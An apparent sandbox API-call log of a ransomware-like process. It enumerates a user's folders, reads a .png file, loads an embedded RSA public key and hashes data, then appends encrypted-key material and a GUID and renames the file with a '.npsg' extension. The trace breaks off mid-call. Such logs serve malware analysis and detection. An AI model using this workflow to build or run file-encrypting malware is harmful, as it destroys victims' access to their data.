[0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c50 [0237.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95c50 | out: hHeap=0x620000) returned 1 [0237.082] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.082] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.082] PathFindFileNameW (pszPath="") returned="" [0237.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0xffffffff [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0237.083] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0237.083] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.085] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0237.086] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.086] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.086] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.086] PathFindFileNameW (pszPath="") returned="" [0237.086] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0xffffffff [0237.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0237.086] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.086] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.087] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0237.087] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.087] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.087] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.087] PathFindFileNameW (pszPath="") returned="" [0237.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3afcdf0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3afcdf0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3afcdf0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3afcdf0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2DVGfW2 wBKbSvaIoJ2e", cAlternateFileName="2DVGFW~1")) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0237.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0237.088] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lVTDtn H8OPDt", cAlternateFileName="LVTDTN~1")) returned 1 [0237.088] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5649ad30, ftCreationTime.dwHighDateTime=0x1d5bfe6, ftLastAccessTime.dwLowDateTime=0xe7e45550, ftLastAccessTime.dwHighDateTime=0x1d5c190, ftLastWriteTime.dwLowDateTime=0xe7e45550, ftLastWriteTime.dwHighDateTime=0x1d5c190, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NkpM1m8S", cAlternateFileName="")) returned 1 [0237.088] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 1 [0237.088] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Rl2ShyOqa7QJpEjNG.png") returned=".png" [0237.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Rl2ShyOqa7QJpEjNG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rl2shyoqa7qjpejng.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.090] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=92381) returned 1 [0237.090] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.093] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x168b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.093] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.095] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x168dd, lpOverlapped=0x0) returned 1 [0237.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.096] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0237.098] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.098] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.098] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.098] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.098] GetLastError () returned 0x0 [0237.098] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.098] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0237.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.098] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.098] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.098] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.099] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0237.100] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x168dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.100] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0237.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0237.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0237.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0237.100] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.100] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.100] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.101] CloseHandle (hObject=0x644) returned 1 [0237.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0237.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0237.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0237.104] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Rl2ShyOqa7QJpEjNG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rl2shyoqa7qjpejng.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Rl2ShyOqa7QJpEjNG.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rl2shyoqa7qjpejng.png.npsg")) returned 1 [0237.106] HeapFree (in: hHeap=0x620000, 